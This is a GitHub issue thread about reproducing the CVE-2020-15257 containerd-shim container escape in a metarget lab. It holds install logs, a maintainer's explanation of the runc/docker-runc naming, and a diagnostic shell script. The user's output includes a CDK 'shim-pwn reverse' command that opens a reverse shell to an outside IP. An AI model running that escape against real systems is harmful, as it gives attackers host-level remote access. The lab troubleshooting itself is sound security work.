Closed duowen1 closed 3 years ago
I set up the environment on Ubuntu 18.04 and on 16.04; the final result was the same in both cases and is shown below. The Linux kernel version is 5.8.0-59-generic.
```
sudo ./metarget cnv install cve-2020-15257 --verbose
cve-2020-15257 is going to be installed
uninstalling current docker gadgets if applicable
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
The following packages will be REMOVED:
  docker-ce
0 upgraded, 0 newly installed, 1 to remove and 444 not upgraded.
After this operation, 181 MB disk space will be freed.
(Reading database ... 133309 files and directories currently installed.)
Removing docker-ce (18.03.1~ce~3-0~ubuntu) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package 'docker' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package 'docker-engine' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package 'docker.io' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package 'containerd' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package 'runc' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
installing prerequisites
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease
Hit:5 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:6 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Hit:7 https://download.docker.com/linux/ubuntu bionic InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
ca-certificates is already the newest version (20210119~18.04.1).
software-properties-common is already the newest version (0.96.24.32.14).
apt-transport-https is already the newest version (1.6.13).
gnupg-agent is already the newest version (2.2.4-1ubuntu1.4).
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable
OK
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
installing docker-ce with 18.03.1~ce~3-0~ubuntu version
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  docker-ce
0 upgraded, 1 newly installed, 0 to remove and 444 not upgraded.
Need to get 0 B/33.9 MB of archives.
After this operation, 181 MB of additional disk space will be used.
Selecting previously unselected package docker-ce.
(Reading database ... 133095 files and directories currently installed.)
Preparing to unpack .../docker-ce_18.03.1~ce~3-0~ubuntu_amd64.deb ...
Unpacking docker-ce (18.03.1~ce~3-0~ubuntu) ...
Setting up docker-ce (18.03.1~ce~3-0~ubuntu) ...
Processing triggers for ureadahead (0.100.0-21) ...
Processing triggers for systemd (237-3ubuntu10.24) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
warning: no candidate version for containerd
warning: docker seems to be installed, but some errors happened during installation
cve-2020-15257 successfully installed
```
The installation succeeded, but warnings were shown.
I then followed the writeup to reproduce it and was able to find the abstract-namespace socket. However, when running the exploit, the result was as follows:
```
root@ubuntu:/tmp# run shim-pwn reverse xx.xx.xx.xx 1234
bash: run: command not found
root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
2021/06/28 07:55:31 tring to spawn shell to 49.232.1.8:1234
2021/06/28 07:55:31 try socket: @/containerd-shim/moby/b2d38375588b3b988f9010ce551d785a2bdb37a497aed068c8482b0776af2910/shim.sock
2021/06/28 07:55:31 rpc error response.: rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
2021/06/28 07:55:31 exploit failed.
```
The error message says that runc is not in PATH, and running runc prompts that it needs to be installed. I found that the runc executable actually installed is docker-runc; after creating a symlink, the exploit succeeded.
It seems that if docker was previously installed on the system, installing the vulnerable environment with metarget afterwards causes this runc naming problem. I'm not sure whether this counts as a bug; perhaps it could be noted in the writeup?
docker-runc, that is, the series of docker- prefixed programs that come with a docker installation (in fact, the reason your exploit later succeeded is that docker-ce automatically installed docker-containerd, since Metarget's containerd installation had failed). @duowen1 Regarding the runc and docker-runc question: in my testing, after containerd is installed successfully (cnv install cve-2020-15257), both runc and docker-runc exist, at /usr/sbin/runc and /usr/bin/docker-runc respectively, and spawning a reverse shell with CDK works without problems on my side.
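The diagnosis in this thread (the shim tried to exec an OCI runtime named `runc`, which was absent, while only `docker-runc` had been installed) and the two paths the maintainer lists can be turned into a small environment check for a lab host. The script below is an added example, not part of metarget or CDK; the candidate paths are the ones named in the thread (/usr/sbin/runc, /usr/bin/docker-runc) plus the usual /usr/bin, /usr/local and /usr/sbin locations (an assumption), and the root-prefix argument is an assumption that lets the check be pointed at a test tree instead of the live filesystem.

```shell
#!/bin/sh
# Added example (not metarget/CDK code): report which runc-like binaries a host has,
# so the "runc not found but docker-runc installed" state from the thread is visible
# before a lab run, rather than surfacing as the shim's "executable file not found".

# Print "name:path" for every candidate OCI runtime binary that exists and is
# executable under the root prefix $1 ("" means the real root). The path list is
# an assumption: the thread names /usr/sbin/runc and /usr/bin/docker-runc; the
# others are common install locations.
find_runc_candidates() {
    root="$1"
    for p in /usr/sbin/runc /usr/bin/runc /usr/local/sbin/runc /usr/local/bin/runc \
             /usr/bin/docker-runc /usr/sbin/docker-runc; do
        if [ -x "$root$p" ]; then
            printf '%s:%s\n' "$(basename "$p")" "$root$p"
        fi
    done
}

# Classify the host:
#   ok               a binary literally named runc exists (the maintainer's working state)
#   docker-runc-only only docker-runc exists (the reporter's failing state: the shim
#                    execs "runc" by name, so this yields the PATH error in the thread)
#   missing          neither exists
runc_status() {
    root="$1"
    have_runc=0
    have_docker_runc=0
    for line in $(find_runc_candidates "$root"); do
        case "$line" in
            runc:*)        have_runc=1 ;;
            docker-runc:*) have_docker_runc=1 ;;
        esac
    done
    if [ "$have_runc" -eq 1 ]; then
        echo ok
    elif [ "$have_docker_runc" -eq 1 ]; then
        echo docker-runc-only
    else
        echo missing
    fi
}

# When run as a script, inspect the live host.
find_runc_candidates ""
echo "status: $(runc_status "")"
```

Run it as `sh runc_check.sh` on the lab host after `metarget cnv install cve-2020-15257`. A `docker-runc-only` verdict is the state the reporter hit, and matches the "no candidate version for containerd" warning in the install log above: Docker's own docker-containerd is present, but the plain `runc` name the shim execs is not; `ok` is the state the maintainer describes, with both /usr/sbin/runc and /usr/bin/docker-runc present.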
This issue will be closed. However the installation problem of containerd has not been solved perfectly yet. If necessary, someone may reopen this issue and we will talk and figure out how to solve it :p